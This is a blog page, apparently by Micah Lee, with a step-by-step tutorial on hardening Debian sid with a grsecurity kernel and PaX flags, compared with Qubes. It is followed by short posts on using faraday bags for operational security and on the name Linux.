<p>Make sure it says <code>Good signature from "Debian CD signing key <debian-cd@lists.debian.org>"</code>. Great! Now, take a SHA512 checksum of the iso (note that your checksum might be different, if you’ve downloaded a newer version of Debian than I did):</p>
<pre><code>$ sha512sum debian-8.2.0-amd64-netinst.iso
923cd1bfbfa62d78aecaa92d919ee54a95c8fca834b427502847228cf06155e7243875f59279b0bf6bfd1b579cbe2f1bc80528a265dafddee9a9d2a197ef3806 debian-8.2.0-amd64-netinst.iso
</code></pre>
<p>Now let’s check to see if that checksum is in the <code>SHA512SUMS</code> file.</p>
<pre><code>$ cat SHA512SUMS | grep 923cd1bfbfa62d78aecaa92d919ee54a95c8fca834b427502847228cf06155e7243875f59279b0bf6bfd1b579cbe2f1bc80528a265dafddee9a9d2a197ef3806
923cd1bfbfa62d78aecaa92d919ee54a95c8fca834b427502847228cf06155e7243875f59279b0bf6bfd1b579cbe2f1bc80528a265dafddee9a9d2a197ef3806 debian-8.2.0-amd64-netinst.iso
</code></pre>
<p>Great, the signed <code>SHA512SUMS</code> file shows the same checksum for <code>debian-8.2.0-amd64-netinst.iso</code> that I got manually. This means that I’ve confirmed that the Debian netinst iso I downloaded hasn’t been tampered with.</p>
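<p>Incidentally, you can let <code>sha512sum -c</code> do that comparison for you: it reads expected checksums from a SHA512SUMS-style file and prints OK or FAILED for each file it checks. Here’s a sketch using a throwaway file; with the real download, you’d run the same <code>grep | sha512sum -c -</code> pipeline in the directory containing the iso and SHA512SUMS.</p>

```shell
# Demo with a stand-in file; for the real check, run the final pipeline
# in the directory containing debian-*.iso and SHA512SUMS.
cd "$(mktemp -d)"
echo "not really an iso" > demo.iso
sha512sum demo.iso > SHA512SUMS     # stand-in for Debian's signed file
grep demo.iso SHA512SUMS | sha512sum -c -
# prints: demo.iso: OK
```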
<p>Finally, burn the iso to a CD or <code>dd</code> it to a USB stick, boot to it, and install Debian.</p>
<p>Note that when it asks you to come up with a root password, you can leave it blank. If you do this, Debian will make your user a sudoer. This might be more familiar to you if you’re used to Ubuntu or Mac OS X.</p>
<p>When you get to the “Partition disks” screen, choose “Guided – use entire disk and set up encrypted LVM” in order to set up full disk encryption. You’ll need to come up with a <a href="https://theintercept.com/2015/03/26/passphrases-can-memorize-attackers-cant-guess/">strong passphrase</a>.</p>
<p><img src="grsec1.png" alt="Full disk encryption"></p>
<p>When you get to the “Software selection” screen, make sure to select GNOME as your desktop environment. That’s what I’m using, and this tutorial includes setting a PaX flag to make GNOME work.</p>
<p><img src="grsec2.png" alt="Install GNOME desktop environment"></p>
<p>Reboot into your freshly installed Debian, mount your encrypted hard drive, and log in. Now it’s time to upgrade from stable to sid. Open a terminal and edit the <code>/etc/apt/sources.list</code> file as root.</p>
<p>It starts out looking like this:</p>
<pre><code>#
# deb cdrom:[Debian GNU/Linux 8.2.0 _Jessie_ - Official amd64 NETINST Binary-1 20150906-11:09]/ jessie main
#deb cdrom:[Debian GNU/Linux 8.2.0 _Jessie_ - Official amd64 NETINST Binary-1 20150906-11:09]/ jessie main
deb http://ftp.us.debian.org/debian/ jessie main
deb-src http://ftp.us.debian.org/debian/ jessie main
deb http://security.debian.org/ jessie/updates main
deb-src http://security.debian.org/ jessie/updates main
# jessie-updates, previously known as 'volatile'
deb http://ftp.us.debian.org/debian/ jessie-updates main
deb-src http://ftp.us.debian.org/debian/ jessie-updates main
</code></pre>
<p>We can delete the cdrom comments, and also the security and updates repositories. Since we’re upgrading to sid, we get the latest versions of all packages, which already include security updates. Finally, change “jessie” to “sid”, so that the resulting file looks like this:</p>
<pre><code>deb http://ftp.us.debian.org/debian/ sid main
deb-src http://ftp.us.debian.org/debian/ sid main
</code></pre>
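<p>If you’d rather script that edit than make it by hand, here’s a sketch that does the same transformation with <code>sed</code>, run against a scratch copy first. Once you’re happy with what it does, point the same <code>sed</code> at <code>/etc/apt/sources.list</code> as root.</p>

```shell
# Practice on a scratch copy that mirrors the stock jessie sources.list.
cd "$(mktemp -d)"
cat > sources.list <<'EOF'
deb http://ftp.us.debian.org/debian/ jessie main
deb-src http://ftp.us.debian.org/debian/ jessie main
deb http://security.debian.org/ jessie/updates main
deb-src http://security.debian.org/ jessie/updates main
deb http://ftp.us.debian.org/debian/ jessie-updates main
deb-src http://ftp.us.debian.org/debian/ jessie-updates main
EOF
# Drop the security and jessie-updates lines, then rename jessie to sid.
sed -i -e '/security.debian.org/d' -e '/jessie-updates/d' \
       -e 's/jessie/sid/' sources.list
cat sources.list
```

The result should be exactly the two sid lines shown above.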
<p>Save and exit. Now, update all of the software; this will take a while. Finally, reboot into sid.</p>
<pre><code>$ sudo apt-get update
$ sudo apt-get dist-upgrade
$ sudo apt-get autoremove
$ sudo reboot
</code></pre>
<p><strong>Compiling the grsec-patched Linux kernel</strong></p>
<p>The Debian wiki’s <a href="https://wiki.debian.org/grsecurity">grsecurity page</a> implies that linux-grsec is already packaged in sid, but it <a href="https://packages.debian.org/search?suite=sid&searchon=names&keywords=linux-grsec">doesn’t seem to be available</a> yet. In the future this will be much simpler, but for now we can compile the Linux kernel ourselves.</p>
<p><strong>Update:</strong> Grsecurity is indeed packaged in sid. The package name (right now) is <code>linux-image-4.3.0-1-grsec-amd64</code>, so you can apt-get install that instead of compiling it yourself if you want.</p>
<p><a href="https://xkcd.com/456/"><img src="xkcd-cautionary.png" alt="Cautionary"></a></p>
<p>Start by installing dependencies:</p>
<pre><code>$ sudo apt-get install libncurses5-dev build-essential fakeroot kernel-package gcc-5 gcc-5-plugin-dev make
</code></pre>
<p>Download the public keys that are used to sign the Linux kernel source as well as the grsecurity patch. You can find the latest Linux kernel signing key <a href="https://kernel.org/category/signatures.html">here</a>, and you can find the latest grsecurity signing key at the bottom of <a href="https://grsecurity.net/download.php">this page</a>.</p>
<p>At the time of writing, here’s how to download the two signing keys:</p>
<pre><code>$ gpg --recv-keys 647F28654894E3BD457199BE38DBBDC86092693E
$ gpg --recv-keys DE9452CE46F42094907F108B44D1C0F82525FE49
</code></pre>
<p>Now download the Linux source code and the grsecurity patch. You’re going to need to download the latest stable version (not any of the longterm versions), because the grsecurity project only releases that version publicly. Because these version numbers change constantly, I’m not going to provide direct links.</p>
<p>Download the latest stable Linux source, as well as the associated PGP signature file, from kernel.org. The files I’m downloading are called <code>linux-4.3.3.tar.xz</code> and <code>linux-4.3.3.tar.sign</code>.</p>
<p>Download the corresponding grsecurity patch, as well as the associated PGP signature file, from grsecurity.net. This will be under the header “test kernel patch”. The files I’m downloading are called <code>grsecurity-3.1-4.3.3-201601051958.patch</code> and <code>grsecurity-3.1-4.3.3-201601051958.patch.sig</code>.</p>
<p>If you’re following along with a version of Linux that’s newer than 4.3.3, type the following instructions yourself instead of copying and pasting, so that the commands correspond with the version of Linux and grsec that you downloaded.</p>
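<p>One way to avoid typos while doing that is to put both version strings in shell variables once and reuse them in every command that follows. The values below are the ones from this walkthrough; substitute whatever you actually downloaded. Since the grsec patch filename embeds the kernel version it applies to, you can also sanity-check that the two match:</p>

```shell
# Versions from this walkthrough; change both when following along later.
KERNEL_VER=4.3.3
GRSEC_PATCH=grsecurity-3.1-4.3.3-201601051958.patch

# The patch name embeds the kernel version, so catch a mismatch early.
case "$GRSEC_PATCH" in
  *"-${KERNEL_VER}-"*) echo "patch matches linux-${KERNEL_VER}" ;;
  *) echo "version mismatch" >&2; exit 1 ;;
esac

# Later commands can then be written once, e.g.:
echo "unxz linux-${KERNEL_VER}.tar.xz"
```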
<p>Decompress the Linux source code.</p>
<pre><code>$ unxz linux-4.3.3.tar.xz
</code></pre>
<p>Verify the signatures. The output of both of these should say “Good signature”.</p>
<pre><code>$ gpg --verify linux-4.3.3.tar.sign
$ gpg --verify grsecurity-3.1-4.3.3-201601051958.patch.sig
</code></pre>
<p>If all went well, extract the Linux source code and then apply the grsec patch.</p>
<pre><code>$ tar -xf linux-4.3.3.tar
$ cd linux-4.3.3/
$ patch -p1 < ../grsecurity-3.1-4.3.3-201601051958.patch
</code></pre>
<p>Start with your existing Linux kernel configuration. Note that your config file might be named differently if you currently have a different version of the Linux kernel installed, so make sure you use the right filename.</p>
<pre><code>$ cp /boot/config-4.3.0-1-amd64 .config
$ make menuconfig
</code></pre>
<p>Navigate to <code>Security options</code>, then <code>Grsecurity</code>, and make sure it’s enabled. Then go to <code>Configuration Method</code> and set it to <code>Automatic</code>. Go to <code>Usage Type</code> and set it to <code>Desktop</code>. Go to <code>Virtualization Type</code> and set it to <code>None</code> (unless you’re testing this in a VM, in which case make sure you choose the right hypervisor). Go to <code>Required Properties</code> and set it to <code>Security</code>.</p>
<p><img src="grsec3.png" alt="Linux kernel options"></p>
<p>Now save and exit.</p>
<p>You can use all of your CPU cores to make compiling the Linux kernel faster by running this.</p>
<pre><code>$ export CONCURRENCY_LEVEL="$(grep -c '^processor' /proc/cpuinfo)"
</code></pre>
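<p>(<code>nproc</code> usually reports the same number more directly, though it also honors CPU affinity, so it can be lower inside containers. Either value works for <code>CONCURRENCY_LEVEL</code>.)</p>

```shell
# Both count processors: grep parses /proc/cpuinfo, nproc asks the C library.
n_grep="$(grep -c '^processor' /proc/cpuinfo)"
n_nproc="$(nproc)"
echo "cores: ${n_grep} (cpuinfo) / ${n_nproc} (nproc)"
```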
<p>Now compile the kernel. This will probably take a really long time. When you’re done you’ll have a deb file you can install.</p>
<pre><code>$ fakeroot make-kpkg --initrd kernel_image
</code></pre>
<p>When this finishes, install the new Linux kernel image.</p>
<pre><code>$ cd ..
$ sudo dpkg -i linux-image-4.3.3-grsec_4.3.3-grsec-10.00.Custom_amd64.deb
</code></pre>
<p>Now let’s make sure GRUB boots into this kernel image by default. First, figure out the menu entry string that GRUB will use for it.</p>
<pre><code>$ grep menuentry /boot/grub/grub.cfg | cut -d "'" -f2 | grep "grsec$"
Debian GNU/Linux, with Linux 4.3.3-grsec
</code></pre>
<p>Now edit <code>/etc/default/grub</code> and change the <code>GRUB_DEFAULT=</code> line to be <code>"Advanced options for Debian GNU/Linux></code> followed by the kernel version string. Put the whole thing in quotes, like this: <code>GRUB_DEFAULT="Advanced options for Debian GNU/Linux>Debian GNU/Linux, with Linux 4.3.3-grsec"</code></p>
<p><img src="grsec4.png" alt="GRUB config"></p>
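<p>Since that value is fiddly to type, here’s a sketch that assembles it from the menu entry found by the <code>grep</code> above. The entry title here is the one from this walkthrough’s kernel; substitute yours.</p>

```shell
# GRUB_DEFAULT joins the submenu title and the entry title with ">".
ENTRY="Debian GNU/Linux, with Linux 4.3.3-grsec"   # from the grep above
echo "GRUB_DEFAULT=\"Advanced options for Debian GNU/Linux>${ENTRY}\""
# prints: GRUB_DEFAULT="Advanced options for Debian GNU/Linux>Debian GNU/Linux, with Linux 4.3.3-grsec"
```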
<p>Save and exit, and then upgrade grub.</p>
<pre><code>$ sudo update-grub
</code></pre>
<p>Before rebooting into the grsec kernel, we need to install PaX tools, which will let us disable memory protections on specific userland binaries.</p>
<pre><code>$ sudo apt-get install paxtest paxctl
$ sudo reboot
</code></pre>
<p>When you boot into the new kernel, everything will be broken.</p>
<p>This is because grsec is killing the <code>gnome-shell</code> process. In order to make your desktop environment work, you need to disable memory protections on the <code>gnome-shell</code> binary.</p>
<p>Press Ctrl-Alt-F1 to switch to tty1 and log in without graphics. Then disable memory protections on <code>/usr/bin/gnome-shell</code> using <code>paxctl</code> (more on how this tool works below).</p>
<p><img src="grsec5.png" alt="Fix gnome-shell"></p>
<p>Here’s the command to run.</p>
<pre><code>$ sudo paxctl -cm /usr/bin/gnome-shell
</code></pre>
<p>Reboot again, and this time GNOME should work.</p>
<pre><code>$ sudo reboot
</code></pre>
<p>Login to your account, and open a terminal to do a few final steps.</p>
<p>Edit <code>/etc/sysctl.conf</code> (as root) and add these lines:</p>
<pre><code>kernel.grsecurity.rwxmap_logging = 0
kernel.grsecurity.grsec_lock = 1
</code></pre>
<p>And activate them.</p>
<pre><code>$ sudo sysctl -p
</code></pre>
<p>Now, make sure that grsecurity is really working like it should.</p>
<pre><code>$ paxtest blackhat
PaXtest - Copyright(c) 2003,2004 by Peter Busser
Released under the GNU Public Licence version 2 or later
Writing output to /home/micah/paxtest.log
It may take a while for the tests to complete
Test results:
PaXtest - Copyright(c) 2003,2004 by Peter Busser
Released under the GNU Public Licence version 2 or later
Mode: Blackhat
Linux rey 4.3.3-grsec #3 SMP Mon Jan 11 12:42:40 PST 2016 x86_64 GNU/Linux
Executable anonymous mapping : Killed
Executable bss : Killed
Executable data : Killed
Executable heap : Killed
Executable stack : Killed
Executable shared library bss : Killed
Executable shared library data : Killed
Executable anonymous mapping (mprotect) : Killed
Executable bss (mprotect) : Killed
Executable data (mprotect) : Killed
Executable heap (mprotect) : Killed
Executable stack (mprotect) : Killed
Executable shared library bss (mprotect) : Killed
Executable shared library data (mprotect): Killed
Writable text segments : Killed
Anonymous mapping randomisation test : 28 bits (guessed)
Heap randomisation test (ET_EXEC) : 23 bits (guessed)
Heap randomisation test (PIE) : 35 bits (guessed)
Main executable randomisation (ET_EXEC) : 28 bits (guessed)
Main executable randomisation (PIE) : 28 bits (guessed)
Shared library randomisation test : 28 bits (guessed)
Stack randomisation test (SEGMEXEC) : 35 bits (guessed)
Stack randomisation test (PAGEEXEC) : 35 bits (guessed)
Arg/env randomisation test (SEGMEXEC) : 39 bits (guessed)
Arg/env randomisation test (PAGEEXEC) : 39 bits (guessed)
Randomization under memory exhaustion @~0: 29 bits (guessed)
Randomization under memory exhaustion @0 : 28 bits (guessed)
Return to function (strcpy) : paxtest: return address contains a NULL byte.
Return to function (memcpy) : Killed
Return to function (strcpy, PIE) : paxtest: return address contains a NULL byte.
Return to function (memcpy, PIE) : Killed
</code></pre>
<p>Congratulations, you’re running Debian with a hardened grsecurity kernel! But you’re not done yet. Lots of your software is going to crash as soon as you run it. The next section shows you how to fix that.</p>
<p><em>Thanks to Kevin Gallagher and the <a href="https://freedom.press/">Freedom of the Press Foundation</a> staff for making a great <a href="https://gist.github.com/ageis/a91f36ca99c252291a00">guide</a> that I based most of this section on.</em></p>
<p><strong>Setting PaX flags so you can actually use your computer</strong></p>
<p>Grsecurity automatically kills processes that use memory in a way that could be an attack. But many programs legitimately use memory this way. In order to use those programs, you need to set PaX flags on their binaries — these flags actually get stored in the binary file’s header. <code>paxctl</code> is a program that lets you view and set these flags.</p>
<pre><code>$ sudo paxctl -h
PaX control v0.9
Copyright 2004,2005,2006,2007,2009,2010,2011,2012,2014 PaX Team
usage: paxctl
options:
-p: disable PAGEEXEC -P: enable PAGEEXEC
-e: disable EMUTRAMP -E: enable EMUTRAMP
-m: disable MPROTECT -M: enable MPROTECT
-r: disable RANDMMAP -R: enable RANDMMAP
-x: disable RANDEXEC -X: enable RANDEXEC
-s: disable SEGMEXEC -S: enable SEGMEXEC
-v: view flags -z: restore default flags
-q: suppress error messages -Q: report flags in short format
-c: convert PT_GNU_STACK into PT_PAX_FLAGS (see manpage!)
-C: create PT_PAX_FLAGS (see manpage!)
</code></pre>
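<p>Those last two options are what “stored in the binary file’s header” refers to: the flags live in an ELF program header, and <code>paxctl -c</code> converts the existing <code>PT_GNU_STACK</code> header into a <code>PT_PAX_FLAGS</code> one. You can see those headers with <code>readelf</code>; a sketch on an ordinary, unconverted binary:</p>

```shell
# An unconverted binary has a GNU_STACK program header and no PAX_FLAGS;
# after `paxctl -c BINARY`, a PAX_FLAGS header would appear in this listing.
readelf -l /bin/sh | grep -E 'GNU_STACK|PAX_FLAGS'
```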
<p>Earlier we ran <code>paxctl -cm /usr/bin/gnome-shell</code>. The <code>-c</code> modified the binary so that it’s able to accept PaX flags, and the <code>-m</code> disabled <code>MPROTECT</code>, meaning that this specific binary is allowed to do things that would get any other binary killed by grsec. You can view the flags that are set like this.</p>
<pre><code>$ sudo paxctl -v /usr/bin/gnome-shell
PaX control v0.9
Copyright 2004,2005,2006,2007,2009,2010,2011,2012,2014 PaX Team
- PaX flags: -----m-x-e-- [/usr/bin/gnome-shell]
MPROTECT is disabled
RANDEXEC is disabled
EMUTRAMP is disabled
</code></pre>
<p>For the most part, all you’ll ever need to do is use <code>paxctl -cm</code> on a binary that you trust to run without <code>MPROTECT</code>. You can always run <code>paxctl -M</code> to enable <code>MPROTECT</code> on it again.</p>
<p>There’s also a cool looking project called <a href="https://github.com/subgraph/paxrat">paxrat</a>, developed by Subgraph, that helps you manage PaX flags. It’s not yet packaged for Debian, and I haven’t yet tested it out, but I look forward to playing with it. For now we can just use paxctl.</p>
<p>To start, let’s set PaX flags for some GRUB binaries.</p>
<pre><code>$ sudo paxctl -cpm /usr/sbin/grub-probe
$ sudo paxctl -cpm /usr/sbin/grub-mkdevicemap
$ sudo paxctl -cpm /usr/sbin/grub-install
$ sudo paxctl -cpm /usr/bin/grub-script-check
$ sudo paxctl -cpm /usr/bin/grub-mount
</code></pre>
<p>And python interpreters.</p>
<pre><code>$ sudo paxctl -cm /usr/bin/python2
$ sudo paxctl -cm /usr/bin/python3
</code></pre>
<p>One issue I’ve run into when trying to set PaX flags with <code>paxctl</code> is an error message that says “Text file busy”. If you run into this issue, you can kill any processes of that binary that are running and then try again. If you have a hard time keeping a process killed, you might try rebooting into recovery mode to set its PaX flags.</p>
<p>How do you know what binaries you should set PaX flags on? Grsec logs its error messages to <code>/var/log/syslog</code>, so let’s start by opening a new terminal and watching all of the grsec error messages that scroll by.</p>
<pre><code>$ sudo tail -f /var/log/syslog | grep grsec
</code></pre>
<p>Now, in a new terminal window, try opening Iceweasel by running its binary.</p>
<pre><code>$ iceweasel
Gtk-Message: Failed to load module "canberra-gtk-module"
Killed
</code></pre>
<p>Iceweasel was killed by grsec, and here’s the error message that was logged to <code>/var/log/syslog</code>.</p>
<pre><code>Jan 11 18:18:25 debian kernel: [ 286.128581] grsec: denied resource by requesting 4096 for RLIMIT_CORE against limit 0 for /usr/lib/iceweasel/iceweasel[iceweasel:1991] uuid/euid:1000/1000 gid:egid:1000/1000, parent /bin/bash[1417] uid/euid:1000/1000 gid/egid:1000/1000
</code></pre>
<p>The important bits there are <code>grsec: denied resource</code> and <code>/usr/lib/iceweasel/iceweasel</code>. (Note that <code>/usr/bin/iceweasel</code> is a symlink to <code>/usr/lib/iceweasel/iceweasel</code>, so this is in fact the Iceweasel binary.)</p>
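<p>If your syslog is busy, a little shell can pull the offending binary’s path out of a denial line for you. A sketch, using an abbreviated copy of the Iceweasel line as sample input:</p>

```shell
# Abbreviated grsec denial line from the syslog excerpt above.
line='grsec: denied resource overstep by requesting 4096 for RLIMIT_CORE against limit 0 for /usr/lib/iceweasel/iceweasel[iceweasel:1991] uid/euid:1000/1000'
# The binary is the absolute path after "for "; the "[" ends it.
echo "$line" | grep -oE 'for /[^[]+' | sed 's/^for //'
# prints: /usr/lib/iceweasel/iceweasel
```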
<p>If you want to use Iceweasel (and risk turning off its memory protections), then use paxctl to disable <code>MPROTECT</code>.</p>
<pre><code>$ sudo paxctl -cm /usr/lib/iceweasel/iceweasel
</code></pre>
<p>Now try running iceweasel again. It should just open this time!</p>
<p>Now, try opening a new tab. My syslog window throws two more errors.</p>
<pre><code>Jan 11 18:26:48 debian kernel: [ 788.651798] grsec: denied resource overstep by requesting 4096 for RLIMIT_CORE against limit 0 for /usr/lib/iceweasel/plugin-container[Web Content:2100] uid/euid:1000/1000 gid/egid:1000/1000, parent /usr/lib/iceweasel/iceweasel[Gecko_IOThread:2041] uid/euid:1000/1000 gid/egid:1000/1000
Jan 11 18:26:48 debian kernel: [ 788.818013] grsec: denied resource overstep by requesting 4096 for RLIMIT_CORE against limit 0 for /usr/lib/iceweasel/plugin-container[Web Content:2114] uid/euid:1000/1000 gid/egid:1000/1000, parent /usr/lib/iceweasel/iceweasel[Gecko_IOThread:2041] uid/euid:1000/1000 gid/egid:1000/1000
</code></pre>
<p>It looks like each time you open a tab, Iceweasel tries running <code>/usr/lib/iceweasel/plugin-container</code> in a subprocess, and grsec kills that process. However, Iceweasel appears to work fine without it, so no big deal. Since it hasn’t affected me yet, I’m going to keep <code>MPROTECT</code> enabled on that binary. If you need to run a plugin in Iceweasel and grsec prevents that from working, then you might consider disabling <code>MPROTECT</code>.</p>
<p>Let’s try another: Tor Browser. The easiest way to install Tor Browser is to use <a href="https://github.com/micahflee/torbrowser-launcher">Tor Browser Launcher</a> (a piece of software I wrote… ahem).</p>
<p>Edit <code>/etc/apt/sources.list</code> as root and add the “contrib” repository.</p>
<pre><code>deb http://ftp.us.debian.org/debian/ sid main contrib
deb-src http://ftp.us.debian.org/debian/ sid main contrib
</code></pre>
<p>Now install Tor Browser Launcher.</p>
<pre><code>$ sudo apt-get update
$ sudo apt-get install torbrowser-launcher
</code></pre>
<p>Now try launching Tor Browser.</p>
<pre><code>$ torbrowser-launcher
</code></pre>
<p>It should pop up a window and download the Tor Browser tarball for the first time. It should also download its PGP signature, verify the signature, extract the tarball, and then try to launch Tor Browser. But when it does, grsec kills the process.</p>
<pre><code>Jan 11 18:38:24 debian kernel: [ 1485.423982] grsec: denied resource overstep by requesting 4096 for RLIMIT_CORE against limit 0 for /home/micah/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/firefox[firefox:3954] uid/euid:1000/1000 gid/egid:1000/1000, parent /lib/systemd/systemd[systemd:1] uid/euid:0/0 gid/egid:0/0
</code></pre>
<p>Tor Browser is trying to run the <code>/home/micah/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/firefox</code> binary, and it fails for the exact same reason that Iceweasel fails. To fix it, disable <code>MPROTECT</code> on that binary.</p>
<pre><code>$ sudo paxctl -cm /home/micah/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/firefox
$ torbrowser-launcher
</code></pre>
<p>This time, Tor Browser will launch without any crashes or grsec errors.</p>
<p><strong>How does Debian with grsecurity compare to Qubes?</strong></p>
<p>I’ve <a href="https://micahflee.com/2014/04/the-operating-system-that-can-protect-you-even-if-you-get-hacked/">written in the past</a> about how awesome <a href="https://www.qubes-os.org/">Qubes</a> is, which is also a reasonably secure operating system. So how does it compare to Debian with a grsec kernel?</p>
<p>In Qubes, you separate your computer into different security domains (also known as AppVMs), but in each of these domains you’re basically running a normal, non-hardened OS. If an attacker hacks you, they only have access to data in a single security domain, and the rest of your data remains safe. In Debian/grsec — like in every non-Qubes operating system that’s currently available, including Windows, Mac OS X, Ubuntu, Arch, etc. — you only have one security domain, so if an attacker hacks you it’s basically game over. But grsec makes it harder for an attacker to successfully hack you. (I’m looking forward to the release of <a href="https://subgraph.com/sgos/">Subgraph OS</a>, which will be the second desktop operating system designed for compartmentalization, and which will be based on Debian, grsec, and Linux containers.)</p>
<p>For example, let’s say an attacker sends you a malicious PDF that secretly exploits a bug in Evince, a popular Linux PDF viewer. Pretend you’re running Qubes and decide to open this PDF in your “personal” security domain that you use for non-work related stuff (really you should open it in a disposable VM, but maybe you didn’t think it was that risky or something). The PDF exploits the bug in Evince and jumps into the attacker’s shellcode, and now the attacker can run whatever commands they want and access any of your data, but only within your “personal” AppVM. They can’t access any of the files in your “work” domain, or your “email” domain, or the networkless “vault” domain that you use to store your PGP secret keys and password databases.</p>
<p>Now pretend you’re running Debian/grsec. You open the PDF, it exploits the bug in Evince and tries to jump to the attacker’s shellcode, but grsec detects that your Evince process is trying to execute code in an off-limits part of memory and kills the process. Evince immediately closes, grsec logs an error to syslog, and you don’t get hacked at all. In this case, grsec completely prevented the attack, while Qubes only contained it.</p>
<p>But now let’s change the example. Instead of Evince, the attacker is exploiting a bug in Iceweasel. If you’re using Qubes, the attacker only hacks the domain that you’re running Iceweasel in. If you’re using Debian/grsec (and you disabled <code>MPROTECT</code> on <code>/usr/lib/iceweasel/iceweasel</code> like we did above), the attacker’s shellcode will run and they’ll have access to all of your files, be able to log your keystrokes, etc. They might have a very difficult time getting root, which will make it harder for them to install a persistent backdoor, but that’s little consolation.</p>
<p>Hardening your kernel with grsecurity is great because it makes it much harder for attacks against you to succeed, but it still doesn’t make it so you can compartmentalize your computer the way that Qubes does. It’s also important to remember that grsec mostly protects you against memory corruption bugs, but other types of security issues exist too. You might run an ssh server and use a crappy password. You might get tricked into copying and pasting something malicious into your terminal. You might be running buggy software that can be exploited without jumping into forbidden memory space, so grsec won’t catch it.</p>
<p>There’s another big difference between Qubes and Debian/grsec: Usability.</p>
<p>Qubes isn’t terribly hard to use (for experienced Linux nerds), but it does require shifting the paradigm about how you think about operating systems, and working around software that isn’t designed for it. For example, it’s not uncommon to have four or five different web browsers open at the same time, all running in different security domains for different purposes. If someone sends you a link, you can’t just click it. You have to decide which domain you’d like to open it in first, and then copy it into that domain’s clipboard before pasting it into a browser. There’s also still a lot of work to be done to make USB devices usable in Qubes. If you want to do some Android development, it’s not the simplest task yet to get Android Studio installed and communicating with your phone over a USB port in an AppVM. Same with video chat. And same with figuring out a workflow to take a screenshot, crop it, and then tweet it. Many tasks are complicated in Qubes simply because you have to deal with compartmentalization and the limitations of virtualizing all of your software — but this is also what gives Qubes its strength.</p>
<p>Debian with grsec doesn’t require this paradigm shift. Once you get past the initial PaX learning curve and make sure that the software you use most often all works, then it’s just like using any other operating system — but you get the invisible-but-awesome benefits of having a hardened kernel. USB devices, webcams, screenshots, and everything else work just like you’re used to. So if you’re not quite ready for Qubes, or if you can’t run Qubes for your specific work for whatever reason, Debian/grsec might be a good choice for you.</p>
<p>The best of both worlds would be running Qubes, but with AppVMs that have grsecurity-patched Linux kernels. This is entirely possible, but no one has yet succeeded in doing it.</p>
<hr>
<h1 id="faraday-bags-and-operational-security">Some Thoughts on Faraday Bags and Operational Security</h1><p><em>By Micah Lee, posted: 2015-11-25</em></p>
<p>I recently took a trip to Moscow to <a href="https://theintercept.com/2015/11/12/edward-snowden-explains-how-to-reclaim-your-privacy/">interview National Security Agency whistleblower Edward Snowden</a> about operational security. In the article I published on The Intercept, I mentioned that I used a faraday bag.</p>
<blockquote><p>Our first meeting would be in the hotel lobby, and I arrived with all my important electronic gear in tow. I had powered down my smartphone and placed it in a “faraday bag” designed to block all radio emissions.</p>
</blockquote>
<p>Since I published my interview, many people have asked me for more information about this faraday bag — which product did I get, what does it protect against, how does it work? So here are some quick thoughts on the topic.</p>
<p><strong>What are faraday bags?</strong></p>
<p>Faraday bags, or more generally, <a href="https://en.wikipedia.org/wiki/Faraday_cage">faraday cages</a>, are named after the brilliant scientist Michael Faraday. If you’re a nerd, I recommend watching the <a href="https://en.wikipedia.org/wiki/The_Electric_Boy">10th episode</a> of Neil deGrasse Tyson’s Cosmos to learn more about him.</p>
<p>They’re made of a material that blocks electric fields from passing through it. Smartphones have a ton of different built-in radios: GSM, CDMA, 2G, 3G, 4G, wifi, bluetooth, NFC, GPS, and others. Each of these communicates wirelessly by sending and receiving information through the air in the form of radio emissions on different frequencies. If you put your smartphone inside of a faraday bag, it might be listening for incoming radio emissions, but none will reach it, and it might be attempting to communicate to the outside, but all of its messages will fail to penetrate the bag.</p>
<p><strong>Which one should I buy?</strong></p>
<p>I bought my faraday bag on Amazon. I didn’t have a particular product in mind; I basically just read reviews and got a nice one that was a little on the bigger side so that I could fit multiple phones, and also my passport (which has an RFID chip, which also communicates using radio emissions).</p>
<p>It doesn’t particularly matter which product you choose, but make sure that you test it after you get it to confirm that it works. Testing it is easy enough. Put your phone inside the bag, and then use another phone to try calling it. If your phone rings, it doesn’t work. You can also test data in a similar fashion — try sending yourself a notification over data (like a Facebook message) and see if your phone receives it while it’s inside the bag.</p>
<p><strong>Why might this be useful for operational security?</strong></p>
<p>First, assume that your smartphone is hacked and that the attacker can utilize all of its radios and sensors. Also assume that your attacker can get information from third party companies, such as your cell phone carrier, which will know your location and be in a position to eavesdrop on much of your phone usage.</p>
<p>Smartphones are crazy useful, so it sucks to not use them just because you can’t trust them. Instead, you can use faraday bags to <em>selectively keep certain information away from your phone</em>, despite the fact that you can’t trust it.</p>
<p>If you carry your phone around with you, your attacker gets to learn your location. From when you turn on your phone after your airplane lands, to taking public transit or a taxi to your hotel, to going out for dinner or drinks, or anything else — the attacker can see your exact location.</p>
<p>So if you want to have a meeting without revealing to your attacker where this meeting is taking place (your attacker can likely infer who you’re meeting with based on what other phones are in the same location), but you don’t want to leave your phone in your hotel room, you can safely bring it with you inside a faraday bag, because your phone itself won’t be able to determine its location. It may try to, but those signals won’t penetrate the material of the bag.</p>
<p>Your phone might be spying on you in other ways, too. It has a microphone, so it could be listening to your conversations and streaming them back to your attacker over the internet, or using some other wireless technology like wifi or bluetooth. Keeping your phone in a faraday bag will prevent your phone from communicating at all.</p>
<p>But here’s an important caveat: Your phone could be listening to your conversations and storing them on disk, waiting for an internet connection. As soon as you take your phone out of your faraday bag, it can use the internet to upload recorded audio to your attacker.</p>
<p>Faraday bags block electric fields, but they don’t block sound. If you don’t want your phone to overhear a conversation, just putting it in a faraday bag isn’t enough. You also need to put it out of earshot. Put it in a different room, muffle it under some pillows, or put it in the refrigerator.</p>
<hr>
<h1 id="why-i-say-linux-instead-of-gnu-linux">Why I say Linux instead of GNU/Linux</h1><p><em>By Micah Lee, posted: 2015-09-18</em></p>
<p>I’ve been writing a <a href="https://theintercept.com/staff/micah-lee/">computer security column</a> for The Intercept. In most of my columns I mention Linux. Even when it’s not directly relevant (though it often is), most of my columns are in the form of tutorials, and I’d like my tutorials to be as useful for Linux users as they are for Windows and Mac users.</p>
<p>For one thing, I love free and open source software. These projects are critical for security, privacy, and for the ability to tinker with and learn about your own computer. As the number of people who run free (as in speech) operating systems rises, so will the development resources that get poured into those operating systems until they “just work” at least as well as Windows and OS X do, so I talk about them every chance I get. Many of my readers already run free operating systems, and I would hate to leave them out.</p>
